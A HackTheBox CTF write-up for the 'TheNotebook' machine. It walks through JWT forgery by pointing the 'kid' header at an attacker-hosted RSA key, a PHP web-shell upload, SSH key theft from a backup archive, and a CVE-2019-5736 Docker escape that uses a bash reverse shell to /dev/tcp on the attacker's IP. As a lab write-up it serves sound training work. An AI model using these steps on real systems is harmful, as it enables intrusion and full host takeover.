Welcome to the TheNotebook writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


TheNotebook

tags: HTB Medium Linux
Platform: Hackthebox
Difficult: Medium
S.O.: Linux

Enumeration

Nmap

We run a scan of all ports to see which ones are open.

# nmap -p- -T4 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:29 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.034s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
10010/tcp filtered rxapi

Nmap done: 1 IP address (1 host up) scanned in 15.99 seconds

Now that we know which ports are open, we are going to analyze them in depth.

# nmap -A -Pn -p 22,80,10010 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:30 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.057s latency).

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   105.30 ms 10.10.14.1
2   105.53 ms thenotebook.htb (10.129.93.6)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 seconds

GoBuster

For the directory enumeration of the web server on port 80, we are going to use gobuster

# gobuster dir -u http://thenotebook.htb/ -w /usr/share/wordlists/dirb/big.txt -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://thenotebook.htb/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/06 22:36:28 Starting gobuster
===============================================================
/admin (Status: 403)
/login (Status: 200)
/logout (Status: 302)
/register (Status: 200)
===============================================================
2021/03/06 22:36:50 Finished
===============================================================

Cookies

On the web page, once we are registered and logged in, we can see that a cookie called auth is created in base64

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Ing0djFsMGsiLCJlbWFpbCI6ImFAYi5jIiwiYWRtaW5fY2FwIjpmYWxzZX0.Hw1TQj4s9fjDUl_iLGaSu0Rk5dhHJUuJ3ITbxlC-jEtLUrPqUmG4b9SfIdwp_kVq6bo4joE_Lr0aoea_T5UIL1rC9S3lditiH-xdrAnWIoTFMMNLZ9_134QgN_VRu98hs9Tm4EBgwkz6EHN9_Ps8WdRy9_VdguRSOLxfvwEDRnhIXzydNmTxii0RBqR-5voTKTmiUO-gjdZ_T1fSYVSHuyvO4o0mL_8ETuoW9KkYAZhXHdzIdj-DjPAtOAuFYqY4m_xZdsf4DGobHQzOxbMWvjJeXXE3v7DTBgMYFT7_gUTtGqIgOQQeHaO9Hfzmf45VzG0yX9q19ezqiGAlbyoSzJpRvHEyeL8ShK5XAUcl_UhbC7GMjaFbwOKA5BTxV0MVNP7SgIPS2i9DypwsQ_xU68enVmWVAoWZeLLFje18x84QoUK8U02wYWRYYs7gBEV2r9DA7uZwRinMQn66sRqG-qTF0KKRWlcshpctWzCNjkIPSl63wmvyOnvVi_MjdCo-YA7hdpuP80pMEIu_Ry6TK1cZ64Ed1GHnxrBDcoKPDKBUEZvgRHU7bloGLbWDbVoYP0LQv1X5r0W-BLbdHyyn3h54OFxHMCYkJ6V4FDurrdVKezk4QqUL_M7HT5OK_R3266lWtuDa_hc2PzqSsgcy7QgzUbEHKYg_Wsb723iYEfs

When we decode it, we can identify 3 important parameters JWT that indicates the type of cookie, kid that configures the URL where the key will be searched to validate the authenticity of the cookie and admin_cap that indicates if we are an administrator or a normal user.

{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}{"username":"x4v1l0k","email":"[email protected]","admin_cap":false}.ÃTÐ..=~0Ô."Æi+´FN].rT¸.ÈM¼e
1--JÏ©I.á¿R|.p¦Ejéº8...¯F¨y¤ùP.õ¬/RÞWb¶!ñv°'X...Ã
-.uß. 5Tn÷Èlõ9¸..0.>..ßO³Å.G/Uv..Hâñ~ü.
.á!|òtÙ.Æ(´D..æú.)9¢Pè#u.õ}&.H{²¼î(Òbü.;¨[Ò¤`.a\ws!ØÃ.ð-8..b¦8..]±þ...ÇC3±lů...\Mïì4Á.Æ.O¸.NѪ"..AáÚ;ÑßÎgøå\ÆÓ%ý«_^Ψ..Vò¡,É¥.Ç.'.ñ(Jåp.rU!l.Æ26.o....SÅ].TÓûJ..Kh½.*p±.TëǧVe....x²Å.í|ÇÎ.¡B¼SM°adXbÎà.Ev¯ÐÀîæpF)ÌB~º±..©1t(¤V.Ë!¥ËVÌ#c..Ò..ð.ü..õb27B¡.;.Ún?Í)0B.G..+W.ë..ÔaçÆ°Cr... T..àDu;nZ.-µ.mZ.?BпUù¯E.-·GË)÷.....Ì .   é^..êëuR.ÎN.©BÌìtù8¤wÛ®¥ZÛ.j.6?:.².2í.3Q±.)..±¾öÞ&.~

Knowing this, we can create our own RSA key to sign the token and modify the cookie to become an administrator.

Exploitation

RSA key creation:

[email protected]:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ ssh-keygen -t rsa -b 1024 -m PEM -f privKey.key                                                                                        
Generating public/private rsa key pair.                                                                                                                                                     
Enter passphrase (empty for no passphrase):                                                                                                                                                 
Enter same passphrase again:                                                                                                                                                                
Your identification has been saved in privKey.key                                                                                                                                          
Your public key has been saved in privKey.key.pub                                                                                                                                          
The key fingerprint is:                                                                                                                                                                     
SHA256:U6nCQGxyuXQzI8mMPU8bV8JQmHD4nhFE9TUFJ/7vE7k [email protected]                                                                                                                                
The key's randomart image is:                                                                                                                                                               
+---[RSA 1024]----+                                                                                                                                                                         
|   *oB=B+.. =oo  |                                                                                                                                                                         
|  o.#[email protected] oo + +   |                                                                                                                                                                         
|   =.O O  + .    |                                                                                                                                                                         
|    .o=  o   .   |                                                                                                                                                                         
|     .ooS     . .|                                                                                                                                                                         
|      o. .     + |                                                                                                                                                                         
|                +|                                                                                                                                                                         
|               E |                                                                                                                                                                         
|                o|                                                                                                                                                                         
+----[SHA256]-----+ 
[email protected]:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ cat privKey.key
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQD043XKd62njtc5tly9C1RUZjf9Pqb+7q7xdCxSqFk8a5PgcOyL
pKYOWMKI5hzrd2VBtZVLH/79FB6OgA/lRsxFBXrDaB/EtYfcRhdAY+uNBni9UqQC
OLzDSvhx18EqOQke7BWxitRcKy2IdrviCeI/tiMBgHbZENM1MqIjAKqGdQIDAQAB
AoGAc9MlgjaqrsaTq1tCb7NtFmImdyPr7kXL/q24zPuNAVPMZGpkpwOf+scmc4OL
CB+3h6Wv0BF5FBAxB6swWXvr3oiINJHQhm8QpjUJ61/YsZ/fqCWsJr9HmFfUrajj
CCLl8wdGZQCpXhtsIIlW6rrDyIofLBx4ygTai5BwQ8bVlkECQQD6vUCvcayrghxA
QJKIJRAfe0alh8qQRPnmVqIU3yowG4drdJvPzSypS/xKq0upHH0jH/sCj0IsmbPo
BUQJXoVlAkEA+gbITVr3ZS7ggesw1FmdnGkEwkzNBB0bhAYaaJEBWT6tjUDoetQw
YnAHoUmQkx1CnLoD3DSGYo5JfqUgx7Kz0QJAQAPpa+F90Bvb0pupzZCI2UDD/Kb6
lHLHyoL7xpBjWPzuSgTvctJTQLXhp76sBnT7jegwUar5niFvySDvCeVT8QJBANw1
RwtieAxk+hVTCMGuYDOXBzr+G39pB4gDPBUmyZJJst968IbmBetdEktKmIwJtFaH
Oskidc2t1is10qYvzVECQER3qnQoryNfEoaTa0aXCCDagvEljMHNvKURJjZdtImn
XEVxRZGddV7WSdmjzmuzGGbcRFl7y7EbPz/aTuUoE3Q=
-----END RSA PRIVATE KEY-----

Creation of the signed cookie:

JWT Encoder

HEADER

{
  "alg": "RS256",
  "typ": "JWT",
  "kid":"http://10.10.14.164/privKey.key"
}

PAYLOAD

{"username":"x4v1l0k","email":"[email protected]","admin_cap":true}

VERIFY SIGNATURE

In the verify signature section, we add the RSA private key content that ssh-keygen generated for us before.

We copy the text that appears in the "Encoded" section.

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNS4yNjo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6ImFkbWluICAgICAgICIsImVtYWlsIjoiYXNAYi5jIiwiYWRtaW5fY2FwIjoxfQ.cI6EeCp4zrIJbQIzofpmnbYThOF2Q6WVesnk14NZrc1pMJw3CaxtdsrB5LOXKqjl-s6ZHufc10q35XLdvWV1148asDssVlGJ0XEyA9E8W2K5C4d4sXXP9NHoxkWLGZGmCdr--4NvnAHXyRmFnQRcNurdh1LoztRAqIVc-rVRu8w

And now it only remains to modify the cookie "auth" with the previous text and turn on the web server where the key is stored.

python -m SimpleHTTPServer 80

And we can now access http://10.129.93.4/admin

Now, entering Upload File we find a form to upload a file.

Let's upload a shell.php

Perfect, we put a terminal to listen, click on View and we will have our shell!

Post exploitation

Enumeration

By listing the system files, we can find the file home.tar.gz inside/var/backups.
When we extract it, we find a copy of the noah's home directory and inside it, hisid_rsa to connect by SSH.

[email protected]:/var/backups$ mkdir /tmp/.htbuser 
[email protected]:/var/backups$ tar -xvf home.tar.gz -C /tmp/.htbuser
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub
[email protected]:/var/backups$

Privilege scalation

Sudo

[email protected]:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

We are going to see the version of Docker that is installed and if there are any exploits available.

[email protected]:~$ docker version
Client:
 Version:           18.06.0-ce
 API version:       1.38
 Go version:        go1.10.3
 Git commit:        0ffa825
 Built:             Wed Jul 18 19:09:54 2018
 OS/Arch:           linux/amd64
 Experimental:      false

Looking for vulnerabilities for docker exec 18.06 we can find that there is one for all versions prior to18.09.2 as we can see in the CVE web page

Based on the exploit of this link we can exploit the CVE-2019-5736 that exploits the vulnerability in docker exec.

To exploit it, we are going to download the main.go file and edit the payload line to replace it with the following:

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.164/8787 0>&1"

Once we have saved it, we compile the file with go build main.go and a file called main will be generated which will be our exploit.

Now we just have to connect to the docker

sudo /usr/bin/docker exec -it webapp-dev01 bash

and load the exploit using wget.

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
[email protected]:~# wget 10.10.14.164/main
--2021-03-07 02:45:21--  http://10.10.14.164/main
Connecting to 10.10.14.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2270002 (2.2M) [application/octet-stream]
Saving to: ‘main’

main                                                        100%[=========================================================================================================================================>]   2.16M   872KB/s    in 2.5s    

2021-03-07 02:45:24 (872 KB/s) - ‘main’ saved [2270002/2270002]

Now, we only have to put a terminal to listen and execute the exploit and when it tells us [+] Overwritten/bin/sh successfullysudo /usr/bin/docker exec -it webapp-dev01 bash sudo/usr/bin/docker exec -it webapp-dev01 bash.

When making the second connection, we can see that the exploit shows the following lines indicating that it has concluded.

[+] Found the PID: 54
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc000350060}

And as we can see, in the terminal that we had listening, we now have a shell as root!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.164] from (UNKNOWN) [10.129.93.75] 42444
bash: cannot set terminal process group (47472): Inappropriate ioctl for device
bash: no job control in this shell
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# id
id
uid=0(root) gid=0(root) groups=0(root)
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# hostname
hostname
thenotebook